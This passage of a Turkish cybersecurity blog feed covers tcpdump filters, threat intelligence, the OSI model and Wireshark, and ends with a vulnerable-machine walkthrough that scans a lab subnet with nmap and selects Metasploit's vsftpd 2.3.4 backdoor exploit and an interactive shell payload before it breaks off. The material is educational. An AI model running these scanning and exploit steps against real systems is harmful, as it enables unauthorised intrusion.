tcpdump aracımız ile paket yakalarken spesifik olarak bizim belirttiğimiz porta göre filtreleme yapmasını istersek aracımıza verdiğimiz tcpdump -vv dst port <PORT_NUM> komutu ile filtreleme işlemini yapabiliriz.Buna örnek olarak

yukarıdaki terminallerdeki işlemi verebiliriz.Öncelikle tcpdump -vv dst port 53 komutu ile DNS protokolünü barındıran paketleri yakalamaya başlıyoruz.Ardından nslookup ile sorgumuzu oluşturuyoruz ve paketleri sonucunda yakalanan paketler tcpdump terminalimizde önümüze düşmeye başlıyor.
Yine bu noktada IP adresi ve port , port ve port olmak üzere tcpdump parametrelerimizi istediğimiz gibi kombinleyebiliriz.

tcpdump host 192.168.0.39 and port 80
tcpdump port 80 or port 53

TCP Flaglerinin Filtrelenmesi

Ağ üzerinden akan tüm trafiğin içinden TCP flaglerine göre filtreleme yapabiliriz.tcpdump 'tcp[tcpflags]==tcp-syn' komutu ile aşağıda görüldüğü gibi SYN paketlerini filtreleyebiliriz.

Aynı şekilde ACK,FIN vb flagleri de bu yöntemle filtreleyebiliriz.

tcpdump 'tcp[tcpflags]==tcp-ack'
tcpdump 'tcp[tcpflags]==tcp-fin'

Sonuç

tcpdump,ağ trafiğini içinde barındırdığı pek çok yetenekle analiz edebilen güçlü,kolay erişimli ve uygulanabilir bir terminal aracıdır.Mesela uzak sistemdeki bir GUI'ye erişimin olmadığı bir durumda tcpdump oldukça işlevli olabilir.Ağ sorunlarını algılayıp çözmek ve ağı güvenli hale getirmek için kullanılır.

Yararlanılan Kaynaklar

https://www.hackers-arise.com/post/2019/09/03/Network-Forensics-Part-3-tcpdump-for-Network-Analysis
https://www.tcpdump.org/papers/ethereal-tcpdump.pdf

Cyber Threat Intelligence

Teoman Yalçınöz — Wed, 26 Jan 2022 00:44:17 +0000

Bu yazımızda Türkçe karşılığı Siber Tehdit İstihbaratı olan Cyber Threat Intelligence ı ele alacağız.Siber saldırganlar faaliyetlerini yürütürken, kullandıkları atak vektörleri ve çeşitlilikleri günden güne artmaktadır.Artan bu siber tehdit faktörlerinden saldırıya uğramadan önce haberdar olmak da bi hayli önemlidir.Keza işletmeler de günden güne siber saldırılar konusunda daha fazla endişe duymakta ve bu alanda yatırımlarını arttırmaktadırlar. Bunun yanı sıra siber saldırganların kaynağının sınırsız olduğu da yadsınamaz bir gerçektir.Bu durumda uygulanan kısıtlı yatırımlar altında doğru güvenlik önlemlerinin oluşturulması için siber tehditin ne olduğu ve nasıl davrandığını doğru kavramak gereklidir.Siber Tehdit İstihbaratı da tam olarak bu noktada karşımıza çıkmaktadır.

Siber Tehdit İstihbaratı Nedir?

Siber tehdit istihbaratı bir kurum veya kuruluşun herhangi bir seviyedeki bilişim sistemleri varlıklarına karşı oluşturulan zararlı yazılımlar ve tehditler hakkında toplanmış,zenginleştirilmiş verilerin belli bir süreçten geçirilerek analiz edilmesi sonucu saldırganların bu saldırıyı gerçekleştirirkenki motivasyonlarını,amaçlarını ve yöntemlerini tespit etmeye odaklanan siber güvenlik alanıdır.CTI,tehditlerin hangi sebeple,neye yönelik,kimin tarafından,kimi hedef almakta gibi sorulara yanıt aramaktadır.Analizin ardından toplanılan bilgilere istinaden gerekli aksiyonların alınmasını esas alır.

Siber Tehdit İstihbaratı Neden Önemlidir?

Siber Tehdit istihbaratı,kurumlar için genel anlamda güvenlik iskeletinin oluşturulmasında ve korunmasında önemli bir rol oynar.Elde edilen veriler analiz edilir ve filtrelenir.Bu bilgilerle beslenen güvenlik operasyonlarının daha etkin yapılandırılması sağlanarak kurum ve kuruluşların gelişmiş kalıcı tehditler, sıfırıncı gün saldırıları,zafiyetlerden yararlanma riskleri ve bunlara karşı nasıl korunacakları konusunda yol gösterici olur.İyi uygulandığında,siber tehdit istihbaratı aşağıdaki hedeflere ulaşılmasına yardımcı olabilir:

Bilinmeyene yol göstererek ekiplerin daha doğru kararlar vermesini sağlar
Saldırgan taktiklerini,tekniklerini ortaya çıkararak güvenlik anlamında elimizi güçlendirir.
Güvenlik uzmanlarının saldırganların, saldırı sırasındaki karar verme sürecini daha iyi anlamasına yardımcı olur.
İhtiyaçları en iyi şekilde karşılayan ürün ve hizmetlerin seçilip harcamaların doğru yapılmasını sağlar.Güvenliğe ayrılan bütçeye katkı sağlar.
Bilinen atak vektörlerine ve zafiyetlere karşı güncel kalmayı sağlar.

Yayınlanmış APT saldırıları

Gelişmiş kalıcı tehdit (Advanced Persistant Threat) saldırıları siber saldırganların bir sisteme veya bir ağa yetkisiz erişim sağladığı ve uzun bir süre boyunca fark edilmeden kalmayı başardığı bilgisayar ağı saldırısıdır.Şirketlerin karşılaşabileceği en tehlikeli saldırılar arasında yer alır.Tespiti oldukça zor olan saldırılardandır.

Siber Tehdit İstihbaratı Türleri Nelerdir?

Siber Tehdit İstihbaratı olay önleme, tespit ve müdahale için çok önemli bir araçtır.Üç seviyeye ayrılabilir: stratejik, taktik ve operasyonel.

1)Taktiksel İstihbarat

Taktiksel tehdit istihbaratı,organizasyonun kaynaklarının korunmasında ciddi bir rol oynamaktadır.Siber tehdit istihbaratı kapsamında elde edilen IOC bilgilerinin siber güvenlik çözümleri olan SIEM, IDP/IPS, DLP gibi ürünlere entegre çalışmasını hedef alan istihbarat çeşididir.IOC'ler,web trafiğinde çok fazla artış olması,veritabanı okumanın artmış olması,aynı dosya üzerinde normalden fazla istek,ip adreslerinin farklı coğrafyalardan gelmesi gibi olağan dışı ve şüpheli hareketler olabilirler.

2)Stratejik İstihbarat

Siber saldırganları tanımaya yönelik olan istihbarat çeşididir.
Saldırganların amaçlarına,motivasyon kaynaklarına,taktik ve metotlarına,geçmişteki eylemlerine ve olması muhtemel saldırılarına yönelik bilgiler içerir.Stratejik istihbarat,özellikle belirli tehditlerin veya kampanyaların arkasında kimin veya kimlerin olduğunu ve spesifik bir kurum veya sektör ile neden ilgilendiklerine ışık tutmayı amaçlar.Üretilmesi en zor tür olma eğilimindedir.Genellikle raporlar şeklinde sunulur.

3)Operasyonel İstihbarat

Operasyonel tehdit istihbaratı,teknik,taktik ve prosedürleri ele alır.Bu bilgiler kurum ve kuruluşların SOC(Security Operation Center) ekiplerine yönlendirilir ve analiz edilip olası saldırılara karşı bir önlem olarak kullanılır.Operasyonel istihbarat,üç istihbarat türünün en değişken olanıdır ve güvenilirliklerinin kontrol edilmesi için SOC ekipleri tarafından yakından incelenmeli ve izlenmelidir.Firewall,IDS/IPS,SIEM,SOAR vb. araçlar tarafından daha iyi tüketilirler.Kuruluşların olası tehdit aktörlerini, saldırganların niyetlerini,yeteneklerini saldırının etkisini anlamalarına yardımcı olur.

Siber Tehdit İstihbaratı Yaşam Döngüsü

İstihbarat yaşam döngüsü kurum ve kuruluşların ortaya çıkan riskleri ve tehditleri önlemek amacıyla savunma mekanizmaları geliştirmelerini destekleyen , elde edilen ham verileri işleyerek istihbarata çevirme sürecidir.Şimdi adımlarını inceleyelim.

1. Gereksinimler ve Planlama

Bu aşamada tehdit istihbaratı operasyonu için uygun plan ve yol haritası geliştirilir.Tehdit istihbaratı yaşam döngüsü için çok önemlidir.Örneğin tehdit istihbaratının geliştirilmesi için gereksinimler nelerdir,hangi istihbarat bilgilerine öncelik verilmelidir vb.Yani sonuç olarak bu aşama,veri gereksinimlerinin belirlenmesinden veri toplamak için kullanılacak yöntemlerin belirlenmesine ve bir toplama planının oluşturulmasına kadar tüm istihbarat programını tanımlar.

2. Toplama

Bu aşamada birinci aşamada tanımlanan gereksinimlere dayanarak ekip,bu hedefleri yerine getirmek için gereken bilgileri toplamaya odaklanır.Elde edilen veriler,çeşitli teknik veya insani yollarla farklı şekillerde toplanabilir.Bunlar insan istihbaratı (HUMINT), görüntü istihbaratı(IMINT), ölçüm ve imza istihbaratı(MASINT), sinyal istihbaratı(SIGINT), açık kaynak istihbaratı(OSINT) gibi kaynaklar aracılığıyla toplanır.Toplama işlemi tamamlandıktan sonra veriler bir sonraki aşamada işlenmek üzere aktarılır.

3. İşleme

Bu aşamaya kadar gelen veriler ham formatta olup istihbarat analizine hazır olmayan verilerdir ve analize uygun bir formatta işlenmesi gerekecektir.Ham veriler, gelişmiş teknoloji ve araçlar kullanılarak anlamlı bilgilere dönüştürülür ve bir sonraki aşama olan veri analizi aşamasında kullanabilecek hale getirilir.
İşleme aşamasının etkili olabilmesi için veri toplama planının, gereksinimlerinin,stratejisinin ve işlenmekte olan verinin doğru anlaşılması gerekir.Bu aşamadaki yapılandırma,ayrıştırma,şifre çözme,filtreleme,birleştirme gibi işlevleri uygulamak için otomatik araçlar kullanılabilir.

4. Analiz

İstihbarat veri setinin uygun bir formatta işlenmesinden sonra , gereksinimler aşamasında sorulan soruların yanıtlarını bulmak, verileri anlamak ve hedefleri karşılayıp karşılamadığını kontrol etmek için kapsamlı bir analiz yapılmalı ve güvenlik sorunları araştırılmalıdır.Analiz edilen bilgiler bir tehdidi belirlemek için yeterli düzeyde anlamlandırıldığında,istihbarat düzeyine yükselir.Bu aşamada potansiyel tehditler tanımlanır ve tehditlere yanıt vermek için karşı önlemlerin geliştirilmesine yardımcı olur.

5. Yaygınlaştırma

Analiz aşamasında elde edilen bilgiler daha sonra otomatik veya manuel yöntemlerle birlikte bu aşamada hedef tüketicilere ve paydaşlara dağıtıma hazır hale gelir.Yapılan analizlerin nasıl sunulduğu genellikle kitleye bağlıdır.Çoğu zaman teknik detaylara derinlemesine girmeden daha sade bir dille tek sayfalık bir raporda veya kısa slaytlar olarak hazırlanabilir.

6. Geri Bildirim

Siber tehdit istihbaratı yaşam döngüsünün son aşamasıdır.Bu aşamada ,yaygınlaştırma aşamasında oluşturulan raporun sunulduğunun sonrasında gelecekteki tehdit istihbaratı operasyonları için hedefler, gereksinimler, prosedürler ve ayarlamaların gerekli olup olmadığını belirlemek için raporun sunulduğu tüketicilerin ve paydaşların geri bildirimi istenir.Elde edilen bu geri bildirim, ilgili ve zamanında yapılan değerlendirmeler yoluyla daha doğru istihbarat üretilmesine yardımcı olur.

Yararlanılan Kaynaklar

https://www.malwarepatrol.net/three-types-of-cyber-threat-intelligence/
https://www.crowdstrike.com/cybersecurity-101/threat-intelligence/
https://info-savvy.com/threat-intelligence-lifecycle/
https://www.threatintelligence.com/blog/threat-intelligence
https://www.kaspersky.com.tr/resource-center/definitions/threat-intelligence
https://www.cisecurity.org/blog/what-is-cyber-threat-intelligence/

OSI Referans Modeli

Teoman Yalçınöz — Mon, 17 Jan 2022 12:57:34 +0000

Ağ kavramı ilk ortaya çıktığından 70'li yılların sonlarına kadar, bilgisayarlar sadece aynı üreticilerin ürettiği bilgisayarlarla iletişim kurardı.Yani farklı marka bilgisayarlar birbirleri ile aynı ağ üzerinde haberleşemiyorlardı.1970'lerin sonlarında, “Open Systems Interconnection (OSI)” OSI modeli “International Organization for Standardization (ISO)” tarafından yukarıda anlatmış olduğum büyük kullanım zorluklarını aşmak için oluşturuldu.

OSI Modeli Nedir?

OSI için genel bir tanım yapmamız gerekirse, network yapısını anlamamızı sağlayan ve network yapısını parçalayarak incelememize/oluşturmamıza olanak sağlayan standart bir mimari yapı olduğunu söyleyebiliriz.Temelde Verilerin ve ağ bilgilerinin bir bilgisayardaki bir uygulamadan ağ medyası aracılığıyla başka bir bilgisayardaki bir uygulamaya nasıl iletildiğini açıklar.OSI referans modeli bu yaklaşımı katmanlara böler.

OSI Katmanları

OSI Referans modelinde, iki bilgisayar sistemi arasında yapılacak olan iletişim problemini çözebilmek için 7 katman mevcuttur.Her bir katman kendi içinde bulunan protokoller ve kurallar bütününe göre, iletişimin nasıl yapılacağını ve diğer katmanlar ile olan etkileşimi açıklar.OSI modeli, bir bilgisayarda çalışan uygulama programının, iletişim ortamı üzerinden başka bir bilgisayarda çalışan diğer bir uygulama programı ile olan iletişiminin tüm adımlarını tanımlar.En üst katmanda görüntü ya da yazı şeklinde yola çıkan bilgi, alt katmanlara indikçe makine diline dönüşür ve sonuç olarak 1 ve 0’lardan ibaret elektrik sinyalleri halini alır ve günümüzdeki birçok popüler ağ teknolojisi, OSI'nin katmanlı tasarımını yansıtmaktadır.

Fiziksel (Physical) Katmanı
Veri Bağlantısı (Datalink) Katmanı
Ağ (Network) Katmanı
İletim (Transport) Katmanı
Oturum (Session) Katmanı
Sunum (Presentation) Katmanı
Uygulama (Application) Katmanı

Şimdi gelin bu katmanları inceleyelim.

1. Fiziksel Katman

1 ve 0 sinyallerinin taşındığı katmandır.
Bu katmanın görevlerinden biri dijital sinyali taşımaktır.
Dijital veri bitlerinin "KAYNAK" cihazın fiziksel katmanından yola çıkarak iletişim ortamı üzerinden "HEDEF" cihazın fiziksel katmanına iletiminden sorumludur.
Katman 1'de kullanılan teknolojilere örnek olarak hublar,repeaterlar ve ethernet kablolarını verebiliriz.

2. Veri Bağlantısı Katmanı

Bir hosttan diğerine hatasız veri transferini gerçekleştirmek için fiziksel katmanın erişim yetkilerini ve kurallarını belirleyen katman veri bağlantısı katmanıdır.
Veri iletimi katmanında veri birimi frame’dir (çerçeve).
Bu katman network içi iletişimi sağlar.
Network içi iletişimi sağlayan switch cihazı bu katmanda görev alır.
Switch, network içi iletişimi üzerinde bulunan MAC tablosuna göre frame’leri ilgili yerlere ileterek sağlar.
MAC Adresleri 6 Byte (48 Bit)’dan oluşan unique(eşsiz) adreslerdir.
Bilgisayarınızda bulunan MAC adresini/adreslerini öğrenmek için;
Windowsta; cmd üzerinden getmac komutunu çalıştırabilirsiniz.
GNU/Linux dağıtımlarında ise, terminal üzerinden ifconfig komutunu çalıştırabilirsiniz.
Bu katmanda iletilen framelerde hata olup olmadığının anlaşılması için bütünlük kontrolü yapılır.
Yine Ethernet, HDLC, Wi-Fi, Token ring, FDDI, PPP, L2TP vb gibi kavramlar bu katmanda geçer.

3. Ağ Katmanı

Bir üst katmanda yani 4. katmanda(Taşıma) segmentlere ayrılan veri, bu katmanda paketlere dönüştürülür.
Her noktanın ayrı ayrı olarak tanımlanmasını sağlayan mantıksal adreslemenin yapıldığı katmandır.
Bu katman, farklı networkler arasında iletişimi sağlamakla görevli katmandır.
Router(yönlendirici) cihazı bu katmanda görev alır.
IP, ICMP , ARP(Address Resolution Protocol) gibi protokoller bu katmanda görev alır.
IP, IPv4, IPv6, ICMP, ARP, IGMP, IPX vb kavramlar bu katmanda görev alırlar.

4. Taşıma Katmanı

Uçtan-uca iletimi sağlayan katmandır.
Bu katmanda üstte gelen veri ağ paketi boyutunda parçalara ayrılır. Bu parçalara segment denir.
Verilerin bozulmadan karşı tarafa gönderilmesinden de sorumludur.
Hata denetimi sayesinde iletilirken bozulmuş kısımlar (segment) belirlenebilir.
TCP ve UDP protokolleri bu katmanda görev alır.

5. Oturum Katmanı

Haberleşecek olan bilgisayarlar arasında bağlantının oluşturulması, sürdürülmesi ve sonlandırılması işlemlerinin yapıldığı katmandır.
Bu katman ,ağ ortamında birden fazla bilgisayarın birbirleri ile olan iletişimini sağlar.Örnek verecek olursak aynı anda farklı bilgisayarlardan , telefonlardan veya tabletlerden ağa bağlanabiliriz veyahutta aynı cihaz üzerinden farklı programları çalıştırabiliriz.
NFS, SQL, ASP ve Telnet bu katmanda tanımlıdır.
Oturum katmanında veri birimi data’dır (veri).

6. Sunum Katmanı

Bu katman,verinin formatının belirlendiği ve paylaşılan verinin anlamlı olmasının sağlandığı katmandır.
Paylaşılan verinin her cihaz tarafından okunabilmesi için datanın ortak bir formata dönüştürülmesi gerekmektedir.
Farklı programların birbirlerine ait veriyi kullanabilmesini mümkün kılar.
Bu katmanın en önemli görevlerinden biri, paylaşılan dataların karşı bilgisayara şifreli olarak iletebilmesidir.
Verinin şifrelenmesi, şifreli verinin çözümlenmesi, sıkıştırılması, genişletilmesi bu katmanda gerçekleşir.
Genel olarak yorumlayacaksak aslında sunum katmanı ağ ile pek ilgili olmayıp yazılımlarla alakalıdır.
Kullanılan formatlardan bazıları GIF,DIVX,FM7,DOC,ASCII

7. Uygulama Katmanı

En üst katmandır, yani kullanıcıya en yakın katmandır.
Kullanıcıların ve programların ağı kullanabilmesi için çeşitli araçlar sunar.
Uygulama katmanı son katman olduğundan diğer katmanlara herhangi bir hizmet sunmaz.
Kullanıcının etkileşimde bulunduğu uygulama programları doğrudan bu katmanla iletişim içindedir.
Kullanıcı tarafından çalıştırılan eposta, veritabanı ve web tarayıcı yazılımları bu katmanda yer alır.
HTTP, DNS, SMTP, FTP, TFTP, UUCP, NNTP, SSL, SSH, IRC, SNMP, SIP, RTP, Telnet vb. protokoller bu katmanda görev alırlar.

Yararlanılan Kaynaklar

https://www.lifewire.com/layers-of-the-osi-model-illustrated-818017
https://d4v1dh4yt3r.medium.com/network-101-hackerın-gözünden-network-yapısı-ve-modern-web-kısım-1-fb77336446f
https://www.teknologweb.com/osi-katmanlari-ve-osi-modeli-nedir

Wireshark ile Ağ Analizi

Teoman Yalçınöz — Sat, 18 Dec 2021 19:18:10 +0000

Wireshark Nedir?

Teoman Yalçınöz for YUSIBER ・ Dec 18 '21

#linux #security #cybersecurity

Daha öncesinde yukarıda bulunan yazıda Wireshark'ın ne olduğundan ne amaçla kullanıldığından bahsetmiştik.Bu yazımızda ise Wireshark aracını kullanarak ağ analizinden bahsedicez.

Wireshark ile DNS analizi

DNS,Domain Name System’in kısaltılmış halidir.Türkçe karşılığı ise Alan İsimlendirme Sistemi olarak bilinir.DNS’in kullanım amacı son derece basittir, kolay anlaşılabilir ve kullanılabilir makine ve alan isimleri ile makinelerin IP adresleri arasında çift taraflı dönüşümü sağlar. IP adreslerinin gündelik hayatta kullanımı ve hatırlanması pek pratik olmadığı için domain isimlendirme sistemi kullanılır.

Bu uygulamamızda

nslookup github.com

komutunu kullanarak github.com'a bir name server lookup isteği oluşturduk , Wireshark ile ağ üzerindeki akan paketleri görüntüledik bu paketler arasından DNS protokolünü kullanan paketleri filtreledik.Nslookup, yani name server lookup verilen parametreye karşılık DNS sorgusu yapıp bilgileri toplayarak kullanıcının alan adlarını veya IP adreslerini bulmaya yarayan bir araçtır.

Ağ trafiğini dinlemeye devam ettik ve birçok paket daha yakaladık.

dns.qry.name == github.com

filtresiyle beraber query name'i sadece github.com olanları sıraladık.Bu aşamadan sonra yakalanan paketlerin üstüne çift tıklayarak paketler hakkında daha detaylı bilgiler edinebilirsiniz.

DNS İçin Kullanılabilecek Diğer Filtreler


- dns.qry.name == "google.com”
- “dns.qry.type == 1 (A Record Type)
- dns.qry.type == 255 (ANY Record Type)
- dns.qry.type == 2 (NS name server)
- dns.qry.type == 15(MX mail exchange

Wireshark ile ARP Analizi

Cihazlar MAC adresleri üzerinden haberleşmekteydi. Bu yüzden de ağ üzerindeki cihazların birbirleri ile paket alışverişi yapabilmesi için MAC adreslerini öğrenmeleri gerekiyordu ve bu öğrenme işlemi IP’si bilinen bir cihazın MAC adresinin öğrenilmesini sağlayan ARP protokolü ile gerçekleştirilir.
Bu uygulamada ise ARP protokolünü kullanan paketleri yakalayıp analiz edicez.

Başlarken ilk adımda

route –n

komutu ile default-gateway ip adresimizi öğrendik ve not ettik.

Gönderilecek paketin hedef IP'sinin bulunduğu ağ,gönderilen paketin ağından farklıysa, paketin orijinal ağın dışına yönlendirilmesi gerekir. Bunu yapmak için, paket gatewaye gönderilir. Yani basit manada default-gateway, yerel ağa bağlı bir yönlendirici arabirimidir.

Ardından Wireshark ile paket yakalama işlemini başlattık.

ping <default gateway>

komutuyla gatewaye ping işlemini başlattık ve ARP protokolü kullanan paketlerimizi yakaladık.
Bir başka yöntemde ise ; paket yakalama işlemini başlatıyoruz ardından

arp-scan –l

komutu ile tüm ağa arp request yolluyoruz (broadcast).

Yapılacak filtrelemelerle yakalanan paketleri ARP reply veya ARP request olarak sınıflandırabiliriz.

ARP İçin Kullanılabilecek Diğer Filtreler


- arp.src.hw_mac == “Kaynak mac adresi”
- arp.dst.hw_mac == “Hedef mac adresi”
- arp.duplicate-address-frame
- arp.opcode == 2             ARP REPLY
- arp.opcode == 1             ARP REQUEST

Wireshark ile ICMP/Ping Analizi

ICMP(Internet Control Message Protocol):

Ağ cihazları için hata raporlama protokolüdür.Paket iletiminde sorun oluştuğunda kaynak ip adresine hata mesajları üretir. IP adresi olan her ağ cihazının icmp paketi gönderme alma ve işleme kapasitesi vardır.
ICMP protokolü genelde uygulamalarda pek tercih edilen bir protokol değildir daha çok ağ yöneticileri tarafından ağ bağlantı testlerinde kullanılan komutlarla yapılır. (ping, traceroute ..)

Ping ise bir bilgisayara gönderilen ve yanıt isteyen bir sinyal paketidir.Kaynak makinenin o anda çalışabilir durumda olduğunu gösterir.Ping aracını genelde ağ ve sistem yöneticileri yerel veya uzak hostun erişilebilirliğini test ederler.

Uygulama kısmında Wireshark ile paket yakalama işlemine başlıyoruz ve ardından icmp filtrelemesini uyguluyoruz.

ping google.com

komutuyla birlikte ping işlemini başlatıyoruz.Ardından Wireshark tarafından yakalanan paketlerle birlikte detaylı analizi yapabiliriz.

Wireshark ile HTTP Analizi

HTTP;Hyper Text Transfer Protocol ,en temelde farklı sistemler arasında iletişime izin verir. En yaygın olarak kullanıcıların web sayfalarını görüntülemesine izin vermek için bir web sunucusundan bir tarayıcıya veri aktarmak için kullanılır.

HTTPS;HTTP Secure , normal HTTP protokolündeki sorun ,sunucudan tarayıcıya akan bilgilerin şifrelenmemiş olmasıdır.Bu da kolayca çalınabileceği anlamına gelir.HTTPS protokolü,sunucu ile tarayıcı arasında güvenli bir şifreli bağlantı oluşturmaya yardımcı olan ve aktarım sırasında potansiyel olarak hassas bilgilerin çalınmasını önleyen bir SSL sertifikası kullanır.

Bu uygulamamızda Wireshark ile paket yakalama işlemini başlattık. Ardından http filtresini uygulayıp yakalanan paketleri filtreledik.
Rastgele http bir siteye girip internet trafiği oluşturduk bu sayede çok sayıda http paketi yakaladık.

Yakalanan paketleri


- http.request.method == "GET"        
- http.request.method == "POST"

filtrelemelerini kullanarak GET ve POST olarak ayırabiliriz.

Bu uygulamamızda ise http filtresi uygulayıp wireshark ile paket yakalamayı başlattık. Ardından login bölümüne geçersiz yani sahte bir çift kullanıcı adı ve şifre girdik.Ardından 130 nolu pakette HTTP POST paketini yakaladık bunu detaylı inceleyelim.

Wireshark HTTP POST paketinin beraberinde giriş bilgilerini de yakalamış oldu.

HTTP İçin Kullanılabilecek Diğer Filtreler


- http.response.code == “200”
- http.user_agent == “User_Agent_Değeri”
- http.referer

Sonuç:

Özetle bu makalemizde Wireshark aracını kullanarak çeşitli ağ içi analizler yaptık ve bunların sonucunda yakalanan paketlerden bilgiler edindik.Wireshark aracıyla daha pek çok farklı protokolü kullanan (DHCP,FTP,TCP,UDP...) paketleri analiz edebiliriz.Bu makaleden sonra ağımızda bulunan bir bilgisayara veya herhangi bir cihaza saldırı olduğundan kuşkulanıyorsak Wiresharkla ağ trafiğini analizleyip kuşkumuzu giderebiliriz :)

Yararlanılan kaynaklar

https://www.greycampus.com/blog/information-security/top-open-source-intelligence-tools
https://www.priviasecurity.com/acik-kaynak-istihbarati-osint-nedir/

Wireshark Nedir?

Teoman Yalçınöz — Sat, 18 Dec 2021 17:45:38 +0000

Wireshark Nedir?

Wireshark,ağda hareket eden veri paketlerini yakalayan ve görüntüleyen açık kaynaklı ücretsiz bir paket analiz yazılımıdır. Wireshark uygulamasının kurulu olduğu bilgisayar üzerinden anlık network trafiği izlenebileceği gibi,daha önce kaydedilmiş trafiğe ait dosyaların incelenmesi amacı ile de kullanılabilir.

Kullanım Alanları

Ağ yöneticileri,ağ içerisindeki hataları tespit edip gidermek için kullanır.
Ağ güvenliği mühendisleri,güvenlik sorunlarını incelemek için kullanır.
Geliştiriciler bunu protokol uygulamalarında hata ayıklamak için kullanır
Eğitim amacıyla ağ paket ve protokollerini öğrenmek için kullanır. ## Kurulumu ## 1)Windows https://www.wireshark.org/download.html adresinden indirilebilir ve standart kurulum adımları uygulanarak kurulum işlemi gerçekleştirilebilir. ## 2)Linux apt-get komut satırı aracında sudo apt-get install wireshark komutu ile gerekli paketlerin edinilmesi ve yükleme işlemi gerçekleştirilebilir.

Kali Linux işletim sistemi üzerinde Application > Sniffing & Spoofing > Wireshark adımlarını takip ederek uygulamayı başlatıyoruz.Hemen arayüzü incelemeye başlayalım.

Ağ trafiğini izlemek amacı ile kullanılabilecek ağ kartları gösterilmektedir.Hemen üstünde ise paketler yakalanmaya başlandığında kullanılacak filtre buradan tanımlanabilir.
eth0 : Ethernet kartı cihazı.
lo: Lookback interface. Yerel ağ'ın oluşması, 127.0.0.1 IP adresinin bir yere işaret edebilmesi için oluşan sanal cihaz.

1 : Yakalanan paketlerin listelendiği kısımdır.
2 : Paketle ilgili detayların görüntülendiği kısımdır.
3 : Seçilen paketin ham verilerinin hexadecimal ve ASCII karşılıklarının göründüğü kısımdır.

Paket Yakalama Algoritma Diyagramı

Ağ trafiğini izlemeye başladık ardından gelen paketleri "tcp" anahtar kelimesini kullanarak filtreledik.
Paketin üstüne çift tıklanınca paketle ilgili detaylı bilgilerin olduğu pencere açılır.

İlk katmanda paketin iletilme tarihi,boyut, sıra ve kullanılan protokol hakkıda bilgi verir.

Şimdi sıra 2. Katmana yani data (veri) katmanına geldi.Bu katmanda protokol olarak Ethernet kullanılmaktadır.
Bu katmanda kaynak ve hedef sisteme ait MAC adresi bilgisine ulaşılabilirsiniz.

Diğer bir katman ise network (ağ) katmanıdır ve protokol olarak IP kullanılmaktadır.Bu katmanda ise kaynak ve hedef IP adresi,IP adresinin kullanım versiyonu ve Header boyutu bilgileri bizlere sunulur.

Bir diğer katman ise Transport ve Application katmanına ait bilgiler içerir.Transport katmanında gelen ve giden port numaraları bu katmana dair Header bilgileri yer alır.

Sonuç:

Özetle bu makalemizde Wireshark'ın ne olduğunu ve hangi amaçlarla kullanıldığından bahsettik.Kurulumu ve kullanımı oldukça basit olan

bu araç yerine göre doğru kullanımda ağ yöneticilerinin eli ayağı olmaktadır.

Yararlanılan Kaynaklar

Zafiyetli Makine Çözümü

Berkay-Şen — Tue, 07 Dec 2021 21:03:35 +0000

Zaafiyetli makine çözümümüze başlamadan önce birkaç kavramı teorik olarak bilmemiz gerekiyor.Örnek olarak Exploit,payload gibi kavramlara hakim olalım ki sızma testi işleminin mantığını kavrayabilelim.

Exploit Nedir?

Exploit bilgisayar, yazılım, programlarda veyahutta
bir sistemde, sistem açıklarından ya da programcının kod
hatalarını kullanarak sisteme sızmaya veya sistemde istenmeyen hatalar oluşturmak için geliştirilmiş yazılımlar ve programlardır diyebiliriz.

Exploitler Neler Yapabilir

Exploitler yetkimizin bulunmadığı bir sisteme izinsiz giriş yapmabilme,verileri çalabilme,verileri görüntüleme,bu verileri değiştirebilme, sistem üzerinde yetkili kullanıcılar oluşturabilme ,sistemin işleyişini yavaşlatabilme,işleyişi aksatabilme veyahutta devre dışı bırakabilme gibi özellikleri gerçekleştirebilirler.

Zero-Day Exploit Nedir?

Zero-Day exploitler henüz daha açığı kapatılmamış,(yama yapılmamış)
exploitlerdir.Hackerlar geliştirdikleri exploitlerin yayılmasını istemezler. Çünkü yayılırsa bu açık kapanacaktır.

Exploit Veritabanları

https://www.rapid7.com
https://www.exploit-db.com
Bu ve bunun gibi sitelerin içerisinde bir çok exploit bulunmaktadır. Rapid7 Metasploit aracının içerisinde bulunan exploitlerin bulunduğu sitedir.Aynı exploitleri Metasploit aracında da bulabiliriz

Payload Nedir ?

Hedef sisteme exploit doğru bir şekilde uygulandıktan sonra hedefe yollanıp çalıştırılaması istenen yazılıma/modüle verilen addır. Bu modül sayesinde karşı tarafla bağlantımız sağlamış olup karşı tarafa göndereceğimiz gereken komutları bizden bekler/dinler ve modül sayesinde açmış olduğumuz servise gönderir ve bu komutların karşı tarafta çalışmasını sağlar.

Bind Payload Nedir?

Bind payload türünde hedefin açık portundan içeriye sızılıp,bizim hedefe bağlanmamızı sağlayan payloadlardır. Biz karşı sisteme bağlandığımız için olası antivirüsler ve firewall’lar yakalayabilir.

Reverse Payload Nedir?

Reverse payload türünde ise karşı hedef bizim cihazımıza bağlanarak sızma işlemi gerçekleştirilir. Karşı hedef bize bağlandığı için firewall ve antivürüslere yakalanma olasığı düşüktür.

Sızma İşlemine Giriş

İlk başta nmap aracı ile ağımızdaki cihazları tarayıp listeleyerek sızacağımız cihazın IP adresini bulalım.

nmap 10.0.2.0/24 –T5

-T5 parametresi ile taramanın hızlı olmasını sağlıyoruz.

Şimdi bu IP üzerinden hedef sistemdeki portlarda çalışan servislerin versiyonları hakkında bilgi alalım.

nmap –sV 10.0.2.4

-sV parametresi servislerin versiyonlarını getirir.

Metasploit Nedir ? ( msfconsole )

Metasploit Framework, hem ofansif hem de defansif güvenlikte kullanılan açık kaynaklı ve Ruby dili ile yazılmış bir platformdur. Metasploit Framework, sistemlerde bulunan açıkların tespit edilmesi, sömürülmesi ve sistemlere sızılması için gerekli araçları içinde barındıran bir yapıdır.

Metasploit Framework’ü Kali Linux içerisinde hazır olarak gelmektedir.Çalıştırmak için ise msfconsole Komutu kullanılmalıdır.

Metasploit üzerinde bir servisin exploitin bulunup bulunmadığını anlamak için search komutunu kullanırız.

search vsftpd

Komutunu kullanarak vsftpd servisinde bir exploitin bulunup bulunmadığını aradık ver karşımıza bir adet exploit çıktı.Bu exploiti kullanmak için bulduğumuz exploitin Name kısmını kullanarak exploiti seçiyoruz.

use exploit/unix/ftp/vsftpd_234_backdoor

Exploitimizi seçtik,şimdi de bu exploite uygun payloadları listelememiz gerekiyor bunun için şu komutu kullanıyoruz.

show payloads

Payloadlar listelendi.Aralarından birini seçmek için ise;

set payload payload/cmd/unix/interact

